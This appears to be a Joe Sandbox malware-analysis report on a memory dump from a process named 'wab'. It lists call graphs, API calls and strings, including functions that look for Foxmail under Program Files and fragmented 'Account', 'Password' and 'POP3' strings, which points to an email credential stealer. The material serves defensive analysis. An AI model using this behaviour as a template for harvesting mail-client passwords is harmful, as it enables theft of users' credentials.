6696 23d75809 6680->6696 6682 23d75910 6682->6649 6684 23d757b4 ___scrt_is_nonwritable_in_current_image 6683->6684 6691 23d75671 RtlEnterCriticalSection 6684->6691 6686 23d757e8 6692 23d757fd 6686->6692 6688 23d757be 6688->6686 6690 23d7571e _free 20 API calls 6688->6690 6689 23d757f5 _abort 6689->6679 6690->6686 6691->6688 6695 23d756b9 RtlLeaveCriticalSection 6692->6695 6694 23d75807 6694->6689 6695->6694 6697 23d75815 ___scrt_is_nonwritable_in_current_image 6696->6697 6704 23d75671 RtlEnterCriticalSection 6697->6704 6699 23d7581f 6705 23d75a7f 6699->6705 6701 23d75832 6709 23d75848 6701->6709 6703 23d75840 _abort 6703->6682 6704->6699 6706 23d75ab5 __fassign 6705->6706 6707 23d75a8e __fassign 6705->6707 6706->6701 6707->6706 6708 23d77cc2 __fassign 20 API calls 6707->6708 6708->6706 6712 23d756b9 RtlLeaveCriticalSection 6709->6712 6711 23d75852 6711->6703 6712->6711 6714 23d7382d 6713->6714 6718 23d7384b ___vcrt_freefls@4 6713->6718 6715 23d7383b 6714->6715 6719 23d73b67 6714->6719 6724 23d73ba2 6715->6724 6718->6636 6729 23d73a82 6719->6729 6721 23d73b81 6722 23d73b8d 6721->6722 6723 23d73b99 TlsGetValue 6721->6723 6722->6715 6723->6722 6725 23d73a82 try_get_function 5 API calls 6724->6725 6726 23d73bbc 6725->6726 6727 23d73bd7 TlsSetValue 6726->6727 6728 23d73bcb 6726->6728 6727->6728 6728->6718 6730 23d73aaa 6729->6730 6734 23d73aa6 __crt_fast_encode_pointer 6729->6734 6730->6734 6735 23d739be 6730->6735 6733 23d73ac4 GetProcAddress 6733->6734 6734->6721 6736 23d739cd try_get_first_available_module 6735->6736 6737 23d739ea LoadLibraryExW 6736->6737 6739 23d73a60 FreeLibrary 6736->6739 6740 23d73a77 6736->6740 6741 23d73a38 LoadLibraryExW 6736->6741 6737->6736 6738 23d73a05 GetLastError 6737->6738 6738->6736 6739->6736 6740->6733 6740->6734 6741->6736 6748 23d73856 6742->6748 6744 23d723f1 6744->6630 6745 23d753da 6744->6745 6746 23d75b7a __dosmaperr 20 API calls 6745->6746 6747 23d723fd 6746->6747 6747->6628 6747->6629 6749 23d73862 GetLastError 6748->6749 
6750 23d7385f 6748->6750 6751 23d73b67 ___vcrt_FlsGetValue 6 API calls 6749->6751 6750->6744 6752 23d73877 6751->6752 6753 23d738dc SetLastError 6752->6753 6754 23d73ba2 ___vcrt_FlsSetValue 6 API calls 6752->6754 6759 23d73896 6752->6759 6753->6744 6755 23d73890 6754->6755 6756 23d738b8 6755->6756 6757 23d73ba2 ___vcrt_FlsSetValue 6 API calls 6755->6757 6755->6759 6758 23d73ba2 ___vcrt_FlsSetValue 6 API calls 6756->6758 6756->6759 6757->6756 6758->6759 6759->6753 6760 23d77bc7 6761 23d77bd3 ___scrt_is_nonwritable_in_current_image 6760->6761 6762 23d77c0a _abort 6761->6762 6768 23d75671 RtlEnterCriticalSection 6761->6768 6764 23d77be7 6765 23d77f86 __fassign 20 API calls 6764->6765 6766 23d77bf7 6765->6766 6769 23d77c10 6766->6769 6768->6764 6772 23d756b9 RtlLeaveCriticalSection 6769->6772 6771 23d77c17 6771->6762 6772->6771 6773 23d7a1c6 IsProcessorFeaturePresent 6959 23d7a945 6963 23d7a96d 6959->6963 6960 23d7a9a5 6961 23d7a997 6968 23d7aa17 6961->6968 6962 23d7a99e 6972 23d7aa00 6962->6972 6963->6960 6963->6961 6963->6962 6969 23d7aa20 6968->6969 6976 23d7b19b 6969->6976 6973 23d7aa20 6972->6973 6974 23d7b19b __startOneArgErrorHandling 21 API calls 6973->6974 6975 23d7a9a3 6974->6975 6978 23d7b1da __startOneArgErrorHandling 6976->6978 6982 23d7b25c __startOneArgErrorHandling 6978->6982 6986 23d7b59e 6978->6986 6979 23d7b286 6981 23d7b292 6979->6981 6993 23d7b8b2 6979->6993 6983 23d72ada _ValidateLocalCookies 5 API calls 6981->6983 6982->6979 6989 23d778a3 6982->6989 6985 23d7a99c 6983->6985 7000 23d7b5c1 6986->7000 6990 23d778cb 6989->6990 6991 23d72ada _ValidateLocalCookies 5 API calls 6990->6991 6992 23d778e8 6991->6992 6992->6979 6994 23d7b8d4 6993->6994 6995 23d7b8bf 6993->6995 6997 23d76368 _free 20 API calls 6994->6997 6996 23d7b8d9 6995->6996 6998 23d76368 _free 20 API calls 6995->6998 6996->6981 6997->6996 6999 23d7b8cc 6998->6999 6999->6981 7001 23d7b5ec __raise_exc 7000->7001 7002 23d7b7e5 RaiseException 7001->7002 7003 23d7b5bc 7002->7003 7003->6982 
7004 23d7af43 7005 23d7af4d 7004->7005 7006 23d7af59 7004->7006 7005->7006 7007 23d7af52 CloseHandle 7005->7007 7007->7006 7008 23d78640 7011 23d78657 7008->7011 7012 23d78665 7011->7012 7013 23d78679 7011->7013 7016 23d76368 _free 20 API calls 7012->7016 7014 23d78693 7013->7014 7015 23d78681 7013->7015 7020 23d754a7 __fassign 38 API calls 7014->7020 7023 23d78652 7014->7023 7017 23d76368 _free 20 API calls 7015->7017 7018 23d7866a 7016->7018 7019 23d78686 7017->7019 7021 23d762ac ___std_exception_copy 26 API calls 7018->7021 7022 23d762ac ___std_exception_copy 26 API calls 7019->7022 7020->7023 7021->7023 7022->7023 7024 23d7284f 7027 23d72882 7024->7027 7030 23d73550 7027->7030 7029 23d7285d 7031 23d7355d 7030->7031 7034 23d7358a 7030->7034 7032 23d747e5 ___std_exception_copy 21 API calls 7031->7032 7031->7034 7033 23d7357a 7032->7033 7033->7034 7035 23d7544d ___std_exception_copy 26 API calls 7033->7035 7034->7029 7035->7034 7036 23d7724e GetProcessHeap 7037 23d72049 7038 23d72055 ___scrt_is_nonwritable_in_current_image 7037->7038 7039 23d7205e 7038->7039 7040 23d720d3 7038->7040 7041 23d7207d 7038->7041 7072 23d72639 IsProcessorFeaturePresent 7040->7072 7051 23d7244c 7041->7051 7044 23d720da 7045 23d72082 7060 23d72308 7045->7060 7047 23d72087 __RTC_Initialize 7063 23d720c4 7047->7063 7049 23d7209f 7066 23d7260b 7049->7066 7052 23d72451 ___scrt_release_startup_lock 7051->7052 7053 23d72455 7052->7053 7056 23d72461 7052->7056 7054 23d7527a _abort 20 API calls 7053->7054 7055 23d7245f 7054->7055 7055->7045 7057 23d7246e 7056->7057 7058 23d7499b _abort 28 API calls 7056->7058 7057->7045 7059 23d74bbd 7058->7059 7059->7045 7076 23d734c7 RtlInterlockedFlushSList 7060->7076 7062 23d72312 7062->7047 7078 23d7246f 7063->7078 7065 23d720c9 ___scrt_release_startup_lock 7065->7049 7067 23d72617 7066->7067 7069 23d7262d 7067->7069 7095 23d753ed 7067->7095 7069->7039 7073 23d7264e ___scrt_fastfail 7072->7073 7074 23d726f9 IsDebuggerPresent SetUnhandledExceptionFilter 
UnhandledExceptionFilter 7073->7074 7075 23d72744 ___scrt_fastfail 7074->7075 7075->7044 7077 23d734d7 7076->7077 7077->7062 7083 23d753ff 7078->7083 7084 23d75c2b 11 API calls 7083->7084 7085 23d72476 7084->7085 7086 23d7391b 7085->7086 7087 23d73925 7086->7087 7088 23d7354d 7086->7088 7090 23d73b2c 7087->7090 7088->7065 7091 23d73a82 try_get_function 5 API calls 7090->7091 7092 23d73b46 7091->7092 7093 23d73b5e TlsFree 7092->7093 7094 23d73b52 7092->7094 7093->7094 7094->7088 7106 23d774da 7095->7106 7098 23d73529 7099 23d73532 7098->7099 7105 23d73543 7098->7105 7100 23d7391b ___vcrt_uninitialize_ptd 6 API calls 7099->7100 7101 23d73537 7100->7101 7110 23d73972 7101->7110 7105->7069 7107 23d774f3 7106->7107 7108 23d72ada _ValidateLocalCookies 5 API calls 7107->7108 7109 23d72625 7108->7109 7109->7098 7111 23d7353c 7110->7111 7112 23d7397d 7110->7112 7114 23d73c50 7111->7114 7113 23d73987 RtlDeleteCriticalSection 7112->7113 7113->7111 7113->7113 7115 23d73c7f 7114->7115 7116 23d73c59 7114->7116 7115->7105 7116->7115 7117 23d73c69 FreeLibrary 7116->7117 7117->7116 7118 23d75348 7119 23d73529 ___vcrt_uninitialize 8 API calls 7118->7119 7120 23d7534f 7119->7120 7121 23d77b48 7131 23d78ebf 7121->7131 7125 23d77b55 7144 23d7907c 7125->7144 7128 23d77b7f 7129 23d7571e _free 20 API calls 7128->7129 7130 23d77b8a 7129->7130 7148 23d78ec8 7131->7148 7133 23d77b50 7134 23d78fdc 7133->7134 7135 23d78fe8 ___scrt_is_nonwritable_in_current_image 7134->7135 7168 23d75671 RtlEnterCriticalSection 7135->7168 7137 23d7905e 7182 23d79073 7137->7182 7139 23d7906a _abort 7139->7125 7140 23d79032 RtlDeleteCriticalSection 7141 23d7571e _free 20 API calls 7140->7141 7143 23d78ff3 7141->7143 7143->7137 7143->7140 7169 23d7a09c 7143->7169 7145 23d79092 7144->7145 7147 23d77b64 RtlDeleteCriticalSection 7144->7147 7146 23d7571e _free 20 API calls 7145->7146 7145->7147 7146->7147 7147->7125 7147->7128 7149 23d78ed4 ___scrt_is_nonwritable_in_current_image 7148->7149 7158 23d75671 
RtlEnterCriticalSection 7149->7158 7151 23d78f77 7163 23d78f97 7151->7163 7154 23d78f83 _abort 7154->7133 7156 23d78ee3 7156->7151 7157 23d78e78 66 API calls 7156->7157 7159 23d77b94 RtlEnterCriticalSection 7156->7159 7160 23d78f6d 7156->7160 7157->7156 7158->7156 7159->7156 7166 23d77ba8 RtlLeaveCriticalSection 7160->7166 7162 23d78f75 7162->7156 7167 23d756b9 RtlLeaveCriticalSection 7163->7167 7165 23d78f9e 7165->7154 7166->7162 7167->7165 7168->7143 7170 23d7a0a8 ___scrt_is_nonwritable_in_current_image 7169->7170 7171 23d7a0ce 7170->7171 7172 23d7a0b9 7170->7172 7179 23d7a0c9 _abort 7171->7179 7185 23d77b94 RtlEnterCriticalSection 7171->7185 7173 23d76368 _free 20 API calls 7172->7173 7175 23d7a0be 7173->7175 7177 23d762ac ___std_exception_copy 26 API calls 7175->7177 7176 23d7a0ea 7186 23d7a026 7176->7186 7177->7179 7179->7143 7180 23d7a0f5 7202 23d7a112 7180->7202 7450 23d756b9 RtlLeaveCriticalSection 7182->7450 7184 23d7907a 7184->7139 7185->7176 7187 23d7a033 7186->7187 7188 23d7a048 7186->7188 7189 23d76368 _free 20 API calls 7187->7189 7194 23d7a043 7188->7194 7205 23d78e12 7188->7205 7190 23d7a038 7189->7190 7192 23d762ac ___std_exception_copy 26 API calls 7190->7192 7192->7194 7194->7180 7195 23d7907c 20 API calls 7196 23d7a064 7195->7196 7211 23d77a5a 7196->7211 7198 23d7a06a 7218 23d7adce 7198->7218 7201 23d7571e _free 20 API calls 7201->7194 7449 23d77ba8 RtlLeaveCriticalSection 7202->7449 7204 23d7a11a 7204->7179 7206 23d78e2a 7205->7206 7208 23d78e26 7205->7208 7207 23d77a5a 26 API calls 7206->7207 7206->7208 7209 23d78e4a 7207->7209 7208->7195 7233 23d79a22 7209->7233 7212 23d77a66 7211->7212 7213 23d77a7b 7211->7213 7214 23d76368 _free 20 API calls 7212->7214 7213->7198 7215 23d77a6b 7214->7215 7216 23d762ac ___std_exception_copy 26 API calls 7215->7216 7217 23d77a76 7216->7217 7217->7198 7219 23d7adf2 7218->7219 7220 23d7addd 7218->7220 7222 23d7ae2d 7219->7222 7227 23d7ae19 7219->7227 7221 23d76355 __dosmaperr 20 API calls 7220->7221 7224 
23d7ade2 7221->7224 7223 23d76355 __dosmaperr 20 API calls 7222->7223 7225 23d7ae32 7223->7225 7226 23d76368 _free 20 API calls 7224->7226 7229 23d76368 _free 20 API calls 7225->7229 7230 23d7a070 7226->7230 7406 23d7ada6 7227->7406 7231 23d7ae3a 7229->7231 7230->7194 7230->7201 7232 23d762ac ___std_exception_copy 26 API calls 7231->7232 7232->7230 7234 23d79a2e ___scrt_is_nonwritable_in_current_image 7233->7234 7235 23d79a36 7234->7235 7236 23d79a4e 7234->7236 7258 23d76355 7235->7258 7237 23d79aec 7236->7237 7242 23d79a83 7236->7242 7239 23d76355 __dosmaperr 20 API calls 7237->7239 7243 23d79af1 7239->7243 7241 23d76368 _free 20 API calls 7252 23d79a43 _abort 7241->7252 7261 23d78c7b RtlEnterCriticalSection 7242->7261 7245 23d76368 _free 20 API calls 7243->7245 7247 23d79af9 7245->7247 7246 23d79a89 7248 23d79aa5 7246->7248 7249 23d79aba 7246->7249 7250 23d762ac ___std_exception_copy 26 API calls 7247->7250 7251 23d76368 _free 20 API calls 7248->7251 7262 23d79b0d 7249->7262 7250->7252 7254 23d79aaa 7251->7254 7252->7208 7256 23d76355 __dosmaperr 20 API calls 7254->7256 7255 23d79ab5 7313 23d79ae4 7255->7313 7256->7255 7259 23d75b7a __dosmaperr 20 API calls 7258->7259 7260 23d7635a 7259->7260 7260->7241 7261->7246 7263 23d79b3b 7262->7263 7300 23d79b34 7262->7300 7264 23d79b3f 7263->7264 7265 23d79b5e 7263->7265 7266 23d76355 __dosmaperr 20 API calls 7264->7266 7269 23d79baf 7265->7269 7270 23d79b92 7265->7270 7268 23d79b44 7266->7268 7267 23d72ada _ValidateLocalCookies 5 API calls 7271 23d79d15 7267->7271 7272 23d76368 _free 20 API calls 7268->7272 7273 23d79bc5 7269->7273 7316 23d7a00b 7269->7316 7274 23d76355 __dosmaperr 20 API calls 7270->7274 7271->7255 7276 23d79b4b 7272->7276 7319 23d796b2 7273->7319 7275 23d79b97 7274->7275 7279 23d76368 _free 20 API calls 7275->7279 7280 23d762ac ___std_exception_copy 26 API calls 7276->7280 7282 23d79b9f 7279->7282 7280->7300 7285 23d762ac ___std_exception_copy 26 API calls 7282->7285 7283 23d79bd3 7288 23d79bd7 
7283->7288 7289 23d79bf9 7283->7289 7284 23d79c0c 7286 23d79c66 WriteFile 7284->7286 7287 23d79c20 7284->7287 7285->7300 7290 23d79c89 GetLastError 7286->7290 7297 23d79bef 7286->7297 7292 23d79c56 7287->7292 7293 23d79c28 7287->7293 7294 23d79ccd 7288->7294 7326 23d79645 7288->7326 7331 23d79492 GetConsoleCP 7289->7331 7290->7297 7357 23d79728 7292->7357 7298 23d79c46 7293->7298 7299 23d79c2d 7293->7299 7294->7300 7301 23d76368 _free 20 API calls 7294->7301 7297->7294 7297->7300 7304 23d79ca9 7297->7304 7349 23d798f5 7298->7349 7299->7294 7342 23d79807 7299->7342 7300->7267 7303 23d79cf2 7301->7303 7306 23d76355 __dosmaperr 20 API calls 7303->7306 7307 23d79cc4 7304->7307 7308 23d79cb0 7304->7308 7306->7300 7364 23d76332 7307->7364 7309 23d76368 _free 20 API calls 7308->7309 7311 23d79cb5 7309->7311 7312 23d76355 __dosmaperr 20 API calls 7311->7312 7312->7300 7405 23d78c9e RtlLeaveCriticalSection 7313->7405 7315 23d79aea 7315->7252 7369 23d79f8d 7316->7369 7391 23d78dbc 7319->7391 7321 23d796c2 7322 23d796c7 7321->7322 7323 23d75af6 _abort 38 API calls 7321->7323 7322->7283 7322->7284 7324 23d796ea 7323->7324 7324->7322 7325 23d79708 GetConsoleMode 7324->7325 7325->7322 7327 23d7969f 7326->7327 7330 23d7966a 7326->7330 7327->7297 7328 23d7a181 WriteConsoleW CreateFileW 7328->7330 7329 23d796a1 GetLastError 7329->7327 7330->7327 7330->7328 7330->7329 7333 23d794f5 7331->7333 7341 23d79607 7331->7341 7332 23d72ada _ValidateLocalCookies 5 API calls 7335 23d79641 7332->7335 7336 23d779e6 40 API calls __fassign 7333->7336 7337 23d7957b WideCharToMultiByte 7333->7337 7340 23d795d2 WriteFile 7333->7340 7333->7341 7400 23d77c19 7333->7400 7335->7297 7336->7333 7338 23d795a1 WriteFile 7337->7338 7337->7341 7338->7333 7339 23d7962a GetLastError 7338->7339 7339->7341 7340->7333 7340->7339 7341->7332 7347 23d79816 7342->7347 7343 23d798d8 7344 23d72ada _ValidateLocalCookies 5 API calls 7343->7344 7346 23d798f1 7344->7346 7345 23d79894 WriteFile 7345->7347 7348 23d798da 

                                                              Control-flow Graph

                                                              APIs
                                                              • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 23D71137
                                                              • lstrcatW.KERNEL32(?,?), ref: 23D71151
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 23D7115C
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 23D7116D
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 23D7117C
                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 23D71193
                                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 23D711D0
                                                              • FindClose.KERNEL32(00000000), ref: 23D711DB
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                              • String ID:
                                                              • API String ID: 1083526818-0
                                                              • Opcode ID: 7c421e7cd06c39da32bbef26412baf468e3140935f1d85fccc1e6d4489b50e18
                                                              • Instruction ID: 607348a98dd29a1ae8c0125a60072ecc3060de4593d67e49c721a137ac179fb3
                                                              • Opcode Fuzzy Hash: 7c421e7cd06c39da32bbef26412baf468e3140935f1d85fccc1e6d4489b50e18
                                                              • Instruction Fuzzy Hash: F32191725043486BD720EA649C48F9B7BACEF94714F040A6EBA98D31D0EB34D61987A6

                                                              Control-flow Graph

                                                              APIs
                                                              • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 23D71434
                                                                • Part of subcall function 23D710F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 23D71137
                                                                • Part of subcall function 23D710F1: lstrcatW.KERNEL32(?,?), ref: 23D71151
                                                                • Part of subcall function 23D710F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 23D7115C
                                                                • Part of subcall function 23D710F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 23D7116D
                                                                • Part of subcall function 23D710F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 23D7117C
                                                                • Part of subcall function 23D710F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 23D71193
                                                                • Part of subcall function 23D710F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 23D711D0
                                                                • Part of subcall function 23D710F1: FindClose.KERNEL32(00000000), ref: 23D711DB
                                                              • lstrlenW.KERNEL32(?), ref: 23D714C5
                                                              • lstrlenW.KERNEL32(?), ref: 23D714E0
                                                              • lstrlenW.KERNEL32(?,?), ref: 23D7150F
                                                              • lstrcatW.KERNEL32(00000000), ref: 23D71521
                                                              • lstrlenW.KERNEL32(?,?), ref: 23D71547
                                                              • lstrcatW.KERNEL32(00000000), ref: 23D71553
                                                              • lstrlenW.KERNEL32(?,?), ref: 23D71579
                                                              • lstrcatW.KERNEL32(00000000), ref: 23D71585
                                                              • lstrlenW.KERNEL32(?,?), ref: 23D715AB
                                                              • lstrcatW.KERNEL32(00000000), ref: 23D715B7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                              • String ID: )$Foxmail$ProgramFiles
                                                              • API String ID: 672098462-2938083778
                                                              • Opcode ID: 5f9b43cb0ad4af9aafdb39524eb316f6816b767e4e5d6b17ab356fa396220d15
                                                              • Instruction ID: 7b4e77b883f46a9e60167dc6a3318ce958acd0df7df09e2d7a280d92b44455db
                                                              • Opcode Fuzzy Hash: 5f9b43cb0ad4af9aafdb39524eb316f6816b767e4e5d6b17ab356fa396220d15
                                                              • Instruction Fuzzy Hash: 1E81B271A00358A9DB30DBA1DC85FDE777DEF84700F0015DAF508E7190EA716A8ACBA5
                                                              APIs
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 23D761DA
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 23D761E4
                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 23D761F1
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                              • String ID:
                                                              • API String ID: 3906539128-0
                                                              • Opcode ID: 1c4f80d4adc87312445648165959cc441b81197e616f261f163af3a6ae4d23a4
                                                              • Instruction ID: 906f5bb21ba19a875a5093d01ce4e8080e6da7ee6c543259e32dc9e95ed5b420
                                                              • Opcode Fuzzy Hash: 1c4f80d4adc87312445648165959cc441b81197e616f261f163af3a6ae4d23a4
                                                              • Instruction Fuzzy Hash: 0E31D47591121CABCB21DF24D988BCDBBB8FF18710F5041DAE81CA7250E7349B958F55
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(?,?,23D74A8A,?,23D82238,0000000C,23D74BBD,00000000,00000000,00000001,23D72082,23D82108,0000000C,23D71F3A,?), ref: 23D74AD5
                                                              • TerminateProcess.KERNEL32(00000000,?,23D74A8A,?,23D82238,0000000C,23D74BBD,00000000,00000000,00000001,23D72082,23D82108,0000000C,23D71F3A,?), ref: 23D74ADC
                                                              • ExitProcess.KERNEL32 ref: 23D74AEE
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentExitTerminate
                                                              • String ID:
                                                              • API String ID: 1703294689-0
                                                              • Opcode ID: 85b5e00ecc8c35abcdcb58b72601c6a7315aa4e46ce803e6e5358c7e287ac710
                                                              • Instruction ID: 3cbcf8a73b4199a7ba65c03cfeae00c4e80eb05f9155d62ff5813cfaf9488de6
                                                              • Opcode Fuzzy Hash: 85b5e00ecc8c35abcdcb58b72601c6a7315aa4e46ce803e6e5358c7e287ac710
                                                              • Instruction Fuzzy Hash: A8E0B636500218AFCF127F64CD0AA4A3B79FF51745B50405DFA058B161EB39ED62CA54
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: HeapProcess
                                                              • String ID:
                                                              • API String ID: 54951025-0
                                                              • Opcode ID: ea17d0935bbba42369622825c29cb2c601e62e1961d8a0d26f9fe2d0e51e03b2
                                                              • Instruction ID: d84791ec31eb7da91dc677c01f89eed462fd4912eb58c323195c78e34086b5f6
                                                              • Opcode Fuzzy Hash: ea17d0935bbba42369622825c29cb2c601e62e1961d8a0d26f9fe2d0e51e03b2
                                                              • Instruction Fuzzy Hash: C2A011322002028F8300AE30820A20C3AACAA20280300002AA80CC0080FB38C0228A00

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 23D71CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 23D71D1B
                                                                • Part of subcall function 23D71CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 23D71D37
                                                                • Part of subcall function 23D71CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23D71D4B
                                                              • _strlen.LIBCMT ref: 23D71855
                                                              • _strlen.LIBCMT ref: 23D71869
                                                              • _strlen.LIBCMT ref: 23D7188B
                                                              • _strlen.LIBCMT ref: 23D718AE
                                                              • _strlen.LIBCMT ref: 23D718C8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: _strlen$File$CopyCreateDelete
                                                              • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                              • API String ID: 3296212668-3023110444
                                                              • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                              • Instruction ID: 754d8def6b58c45a1c43032efebbf5dd73c698d4c568df2d697316cd6d031a41
                                                              • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                              • Instruction Fuzzy Hash: 636133B1D00318ABEF21CBA4C840BDEB7B9AF55200F0442DED255B7288EB745A47CF66

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: _strlen
                                                              • String ID: %m$~$Gon~$~F@7$~dra
                                                              • API String ID: 4218353326-230879103
                                                              • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                              • Instruction ID: 10e00d4f21c746b58f38367779caf73e30c200fcee73f8a369f1abab3cb69209
                                                              • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                              • Instruction Fuzzy Hash: 7371F771D003689BDB229BB49888ADF7BFCAF15604F1440DEE644D7241EA749786CBA0

                                                              Control-flow Graph

                                                              • Graph image not reproduced. Basic blocks 23d77cc2-23d77e0b; subroutine calls: 23d7571e (repeatedly), 23d790ba, 23d791b8, 23d77e35.
                                                              APIs
                                                              • ___free_lconv_mon.LIBCMT ref: 23D77D06
                                                                • Part of subcall function 23D790BA: _free.LIBCMT ref: 23D790D7
                                                                • Part of subcall function 23D790BA: _free.LIBCMT ref: 23D790E9
                                                                • Part of subcall function 23D790BA: _free.LIBCMT ref: 23D790FB
                                                                • Part of subcall function 23D790BA: _free.LIBCMT ref: 23D7910D
                                                                • Part of subcall function 23D790BA: _free.LIBCMT ref: 23D7911F
                                                                • Part of subcall function 23D790BA: _free.LIBCMT ref: 23D79131
                                                                • Part of subcall function 23D790BA: _free.LIBCMT ref: 23D79143
                                                                • Part of subcall function 23D790BA: _free.LIBCMT ref: 23D79155
                                                                • Part of subcall function 23D790BA: _free.LIBCMT ref: 23D79167
                                                                • Part of subcall function 23D790BA: _free.LIBCMT ref: 23D79179
                                                                • Part of subcall function 23D790BA: _free.LIBCMT ref: 23D7918B
                                                                • Part of subcall function 23D790BA: _free.LIBCMT ref: 23D7919D
                                                                • Part of subcall function 23D790BA: _free.LIBCMT ref: 23D791AF
                                                              • _free.LIBCMT ref: 23D77CFB
                                                                • Part of subcall function 23D7571E: HeapFree.KERNEL32(00000000,00000000,?,23D7924F,?,00000000,?,00000000,?,23D79276,?,00000007,?,?,23D77E5A,?), ref: 23D75734
                                                                • Part of subcall function 23D7571E: GetLastError.KERNEL32(?,?,23D7924F,?,00000000,?,00000000,?,23D79276,?,00000007,?,?,23D77E5A,?,?), ref: 23D75746
                                                              • _free.LIBCMT ref: 23D77D1D
                                                              • _free.LIBCMT ref: 23D77D32
                                                              • _free.LIBCMT ref: 23D77D3D
                                                              • _free.LIBCMT ref: 23D77D5F
                                                              • _free.LIBCMT ref: 23D77D72
